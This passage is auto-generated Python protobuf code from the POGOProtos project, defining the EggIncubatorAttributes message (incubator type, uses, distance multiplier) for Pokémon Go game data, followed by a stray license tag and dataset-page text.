serialized_pb=_b('\n<POGOProtos/Settings/Master/Item/EggIncubatorAttributes.proto\x12\x1fPOGOProtos.Settings.Master.Item\x1a+POGOProtos/Inventory/EggIncubatorType.proto\"\x83\x01\n\x16\x45ggIncubatorAttributes\x12>\n\x0eincubator_type\x18\x01 \x01(\x0e\x32&.POGOProtos.Inventory.EggIncubatorType\x12\x0c\n\x04uses\x18\x02 \x01(\x05\x12\x1b\n\x13\x64istance_multiplier\x18\x03 \x01(\x02\x62\x06proto3')
,
dependencies=[POGOProtos_dot_Inventory_dot_EggIncubatorType__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_EGGINCUBATORATTRIBUTES = _descriptor.Descriptor(
name='EggIncubatorAttributes',
full_name='POGOProtos.Settings.Master.Item.EggIncubatorAttributes',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='incubator_type', full_name='POGOProtos.Settings.Master.Item.EggIncubatorAttributes.incubator_type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='uses', full_name='POGOProtos.Settings.Master.Item.EggIncubatorAttributes.uses', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='distance_multiplier', full_name='POGOProtos.Settings.Master.Item.EggIncubatorAttributes.distance_multiplier', index=2,
number=3, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=143,
serialized_end=274,
)
_EGGINCUBATORATTRIBUTES.fields_by_name['incubator_type'].enum_type = POGOProtos_dot_Inventory_dot_EggIncubatorType__pb2._EGGINCUBATORTYPE
DESCRIPTOR.message_types_by_name['EggIncubatorAttributes'] = _EGGINCUBATORATTRIBUTES
EggIncubatorAttributes = _reflection.GeneratedProtocolMessageType('EggIncubatorAttributes', (_message.Message,), dict(
DESCRIPTOR = _EGGINCUBATORATTRIBUTES,
__module__ = 'POGOProtos.Settings.Master.Item.EggIncubatorAttributes_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Settings.Master.Item.EggIncubatorAttributes)
))
_sym_db.RegisterMessage(EggIncubatorAttributes)
# @@protoc_insertion_point(module_scope)
| mit |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.